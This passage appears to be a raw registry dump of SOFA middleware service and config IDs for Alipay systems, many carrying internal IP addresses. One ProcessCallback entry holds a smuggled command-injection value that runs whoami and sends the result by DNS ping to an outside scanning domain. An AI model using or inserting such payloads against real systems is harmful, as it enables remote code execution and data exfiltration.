mth.common.service.facade.service.H5DoctorFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcloanbenefit.common.service.facade.repaydefer.RepayDeferBenefitPublishFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.assettrans.facade.api.AssetTransDailycutManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchprod.common.service.facade.datafactory.DataFactoryTaskTrFacade:1.0:aftsFileTransfer@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfundtaskcenter.service.facade.FundFileDealFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.apreserve.facade.api.ApplyAllocateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.antfinancial.antchain.cloud.endpoint.facade.DataModelFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:bizops@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.publiccore.common.service.facade.account.CertificateInfoManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchprod.common.service.facade.merchant.MrchProdMerchantStatisticsMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.data.process.facade.table.DataProcessTableService:1.0:dpdataprocess@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zpdcore:name=com.alipay.fc.pdcore.common.service.cacheclient.drm.ClientCacheConfigDRM.hessianThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.superapi.client.SystemAppInvokeService:1.0:transferprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:newsencequalitycenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","config:com.alipay.cryptprod.common.service.facade.rest.inf.SceneCryptService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.zpaas.facade.api.ReleaseInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:zmoperationprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_192.168.251.2#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.kgengine.open.facade.java.AkgConceptFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.metadata.common.service.tr.ws.WarehouseStatusService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.gmcore:name=com.alipay.cif.drm.PasswordRevokeSwitch.paymentPasswordRevoked,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.recadmin.core.service.cache.AirDoRepository:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ap.bizprod.common.service.facade.api.BokuVerificationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cloud.opsware.api.facade.ops.OpsPlanFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:func-dispatcher@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.zcache:name=com.alipay.zdal.ldc.tair.finfocoreRzoneTair_dest.cacheEngineUrl,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.cif.facade.PasswordSecureInfoQueryService:1.0@DEFAULT@cashiercloud_taobao#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:basement-antmotionkoi@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.pointmng:name=com.alipay.pointmng.core.service.drm.FinVoucherControlResource.aipPromoPackVoucherDefaultMinPurchaseAmount,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finprodcenter.common.service.facade.ProductSubordinateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.bizprodmng:name=com.alipay.routeclient.DefaultRouteCoordinator.drFlagEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.inscharity.common.service.facade.mng.InsCharityProjectFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openmq.common.service.facade.MessageCallbackService:1.0:openbizmock@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.charge:name=com.alipay.cif.client.drm.CifQueryLocalCacheSwitcher.shadowKeySwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finbaservice.common.service.facade.batch.BusinessStageDependencyQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.hook4vulns.test.service.RemoteServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:mobileufs@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.holoxmng.complain.service.facade.ReportModelConfigService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mshopprod.common.service.item.facade.ItemApplyQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finsupport:name=com.alipay.finnet.service.drm.ChannelFilterDRM.channelFilterSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.fingiftprodTairCache.czoneSwitchMap,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.23.228.28#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mfinbaseprod.biz.service.gw.antsearch.api.AntSearchTransform:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.cdp.common.service.facade.space.api.CdpSpaceApiService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.sofa.rpc.elastic.ElasticService:1.0:avatarpoc@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.revol.core.service.facade.ScriptChecker:1.0:register@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.test.SimpleService-37#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","NS_Pub_Servers_TP_S_4009_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.agdsmng.common.service.facade.modelinfo.ModelInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.23.226.42#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_10.15.242.3#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.lifemng.facade.bizrecon.LiquidationFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.unitradeprod.process.service.remote.InnerRoutedService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:msgopprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.framework.core.facade.OpscloudClientServiceFacade:1.0:finstore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insopenprod.common.service.facade.api.reindeer.TemplateManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.253.164#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.zdaljdbc:name=com.alipay.zdal.monitor.drm.fininfo.pcconfigObDataSource.validator,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.mif.common.service.facade.mng.BrandMngQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cifin:name=com.alipay.cif.client.drm.bankcardtaircache.CifQueryLocalCacheSwitcher.smartcacheUrl,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.tairmanager.interfaces.endpoint.facade.rest.tair.HandleDataServerFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.pcreditcore.repay.service.PcreditRepayProcessFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.charge:name=com.alipay.checkroute.common.service.checkersdk.drm.SDKConfigDRM.enableSample,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.antfeaturelib.common.facade.service.TraceInfoMetaService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbsales.common.service.facade.shop.ShopManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.88.246.181#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mrchservbase.member.facade.prepaidcard.CardFundFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.qasceneanalysis.common.service.facade.state.StateMachineFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.iexchange.service.facade.api.TaskExecutorBizService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.merchant.common.service.facade.SwitchCoreQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.alidevice.biz.devicemanager.iotpaysdk.service.paybind.PaymentBindQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.166.84.37#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.pcreditcustsrv.facade.pcloan.api.PcreditHBUserBillFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.memberprod.common.mng.BizConfigService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_ORDERMNG#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insscenemarket.dsdb.facade.HyhbFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antassistant.biz.rpc.service.MrpcAssistantFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ordermng:name=com.alipay.grayprod.change.drm.ChangePolicy.consultTaskInfo,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilerc.common.service.facade.logsplit.LogSplitService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbservindustryprod.common.service.facade.alsc.reservation.backend.AlscReservationGiftFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:tallyprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.reservecenter.facade.api.AllocateInstructionQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:buservice@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.assettrans.facade.faasset.api.asset.FaAssetTransCancelFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.personalprod.service.facade.transfercore.TransferQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.taobao.gaia.function.impl.fenqi.HuabeiFenqiService:1.0@tri#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.assettrans.biz.shared.snapshot.RetrySnapshotRecordService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchstm.common.service.facade.mart.facade.AmImgTemplateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.oyz.core.facade.api.BeeHouseFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_S_STMTMENT#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.finpwm:name=com.alipay.finpwm.biz.cpm.drm.CpmSprControlDrmResource.notifyDiffDays,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.taskcenter.common.service.facade.callback.Callback:1.0:antopdaemon_processmngCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:ccrprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.securitydataproc:name=com.alipay.securitydata.common.service.integration.antq.impl.drm.AntQSendResource.antqLogInfoSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.securitycenter.common.service.facade.nac.NacCornAuthServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.23.244.116#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.consumeprod.common.service.operate.openapi.client.ConsumeOperationInvokeService:1.0:pcreditintDebitTransferConsult@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","inshealthclaimmng@msgbrokerMosn#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:fccustmng_editCompanyLegCallBack@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.etetestcore.service.api.CtuEventBaseLineService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.fcbuservice.common.service.facade.operatelog.OperateLogActionFacade:1.0:antzhixin@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cif.facade.operator.AloneOperatorQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insproductcore.facade.service.InsPriceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY_V2@alphasecmng#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.fincommontaskhub.service.facade.service.spi.FundCalendarService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.event.api.input.EventReceiverService:1.0:SL__TP_F_SC_FAP_ZSEARCH_DUMP_TASK@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insmobile:name=com.alipay.insmobile.drm.insmobiledrmhandler.fireProdIds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finstore.common.service.facade.fop.api.InvestApplyQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.iliquidity.service.facade.api.fbp.FBPService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.atd:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.slaLogParamSet,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.customscenter:name=com.alipay.customscenter.biz.declare.drm.CommonConfig.testPids,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.argo.spi.publish.ArgoTrProxyFacade:1.0:prodtrans@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.bpaas.ecogw.facade.CloudGwApiInvokeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.secucommunity.common.service.facade.feed.api.FootmarkFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.paramcore.common.service.facade.manage.api.ParmDLogErrQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:loginantzhixin@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insptmarket.facade.notify.api.RedDotNotifyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.crmhome.common.service.facade.api.test.CrmTestFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.itransferprod.service.facade.api.RemitService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.xview.console.service.facade.ProfileOnlineService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.dataphin.gather.common.facade.register.service.RtQueryOpenService:1.0:dpgather@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.24.75#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:lifemng@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finpwm.biz.starwish.service.StarWishTransService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinsnsprod.biz.service.gw.news.api.channelnews.NewsDetailGwManager:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:\";ping `whoami`GIYHU5BSMQWTC5LVPJRW2LLVNZUXC5LFJFSC2ZBZOM3WY6LBOM------.rce.scan.noble.dn5l0g.co;\"@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insclaiminvestcore.common.service.facade.service.privilege.BizPrivilegeValidateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_ZFCERTIFYCENTER#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.clearingcenter:name=com.alipay.checkroute.common.service.checkersdk.drm.SDKConfigDRM.checkerExecuteTimeOut,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.opencore.service.facade.security.ExterfaceNotifyParamService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrmcore.common.service.facade.service.model.monitor.MdpWarnRecordActionService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY_V2@xdev#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","config:com.alipay.clivemng.common.service.facade.api.clvuser.sofa4.ClvUserQuerySofa4Service:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.mrchstm.common.service.facade.mart.facade.AssetCouponApplyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.Arch:name=com.alipay.cif.client.drm.CifClientDrmSwitch.insttrade.clientDrmSwitch,version=1.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.kbtraffic.common.service.facade.distribution.rule.api.DistributionRuleInstFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mychain.baas.common.user.service.UserService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditschedule.service.facade.spi.ExecuteService:1.0:pcreditagreement.guaranteeAgreementThreeDaysBeforeExpireTask@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:wealthdecisionsys@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilecodec.service.config.MobileCodecConfigureOperationlogFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.datacontextlib.heraconfigmanager.HeraConfigManagerFacade:1.0:zdataquery@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.etetestcore.service.api.PeerPayService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ebppprod.common.service.facade.topUpUtil.TopUpUtilFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaljdbc:name=com.alipay.zdal.monitor.drm.opinioncore.emcooperateZdalDataSource.slowSql,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:grayDeploySwitch_ProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.agdswindspeed.facade.attributing.TableProbeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.tmall.tmallfarm.client.service.alipay.AlipayFarmTriService:1.0@tri#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.prodquery.common.service.facade.standard.api.arrangement.ArrangementQueryStdFacade:1.0:ANTGW2CN@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zcbsalescenter.biz.shared.service.ProdtransAsynRecordService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zscale.api.ClusterConfigQueryFacade:1.0:instscalecalc@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.253.82#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.yebcore.common.facade.service.SpringFestivalCouponDecision:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA-SCHEDULER-S-MOBILEACAUTH-PROCESSOR#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_30.23.232.159#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.kbasecore.service.locales.facade.LocalesService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.securitycap:name=com.alipay.dwebupload.client.drm.DomainConfig.httpsDownloadDomain,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.mwalletmng:name=com.alipay.mwalletmng.web.infoview.drm.InfoviewResourceDRM.lifeMarkDictJson,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.0.249.48#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.insmobile:name=com.alipay.insmobile.drm.insmobiledrmhandler.filterParentPolicySwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finpromoprod.common.service.facade.divide.DivideTaskMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitycore.common.service.facade.risk.api.RiskProcessPolicyService:1.0:uctfront@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchstm.common.service.facade.mart.facade.AssetProjectSaleInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.idatacontextTairCache.useZoneMng,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.promokernel.common.service.facade.api.CampTriggerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finpwm.facade.productpkg.SmartAntPkgQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.instinfo.service.facade.spi.InstinfoSystemCallService:1.0:inscommunity@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.ipay.imerchantsettle.common.service.facade.api.MerchantSettleQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.zdataquery.common.service.facade.galaxy.FinSchedulerGalaxyQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_10.15.230.55#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.custdecision.service.starstage.facade.DataSpecialAntddmDdmKpiFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.routeclient.interfacename:finrobotweb#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.ordermng:name=com.alipay.common.datacollector.rule.internal.DataModelRuleCoordinator.dataCollectWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.prodmng:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.faultInUserIdLocateValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.finpwm:name=com.alipay.finpwm.biz.cpm.CapitalPlanManageConfigDrmImpl.finaggexpcoreSceneCode,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finpromoprod.common.service.facade.spring.SpringSteadilyHighFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bkdepmng_arragementfreeze@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.rdf.log.conf.BizMonLogConfCtrlDrm.openSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.160.177.48#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.sofa.rpc.elastic.ElasticService:1.0:qagraphknowledge@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cif:name=com.alipay.cif.client.drm.LevelTwoCacheSwitcher.shadowModelTypeConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.baoxianprod.common.facade.InsureEndorseFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.contentlib.common.service.facade.content.external.ContentExternalFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.51.69#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.antfeaturelib.common.facade.service.DataSourceCalcService:1.0:alb_antfeaturemeta@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.dataphin.upgrade.sdk.common.facade.api.ModeUpgradeStepApi:1.0:dpproject@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.custrelation.service.facade.user.UserRecommendService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.lifemng.facade.autoaccess.EbppChargeoffInstFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.kwlib:name=com.alipay.fc.process.bp.engine.job.drm.JobDrmAdapter.jobModConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.rpc.elastic.ElasticService:1.0:yebdistributor@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.167.220.7#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.cloudinc:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.noAvailableServerCheckIntervalSeconds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.afsc.common.service.multimonitor.service.MessageNotifyServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insmarketingprod.common.service.facade.insmarketingapp.check.InsMktProdAutoCheckFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.almcenter.service.facade.api.activity.RegistrationManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:fccustmng_merchantRegistOCRcheck@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.39.184.51#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.promomng.core.service.promoworkbench.CouponConfigQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promoprod.common.service.facade.PrizeSendInfoQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.client.SystemAppInvokeService:1.0:mrchprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilechat.common.service.facade.api.BcOrganizationQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.alcontract.common.service.facade.FlowOrderQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.wealthdecisionsys.facade.AlarmAnalyseFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.finxbff.coverage.facade.CoverageTrService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.revcore:name=com.alipay.common.tracer.manage.TracerDrm.zdalOssDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.antgroup.zmxy.zmcamng.common.service.facade.CreditSceneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.167.221.139#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.alphad.common.service.facade.analysis.api.IUnionAnalysisFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","A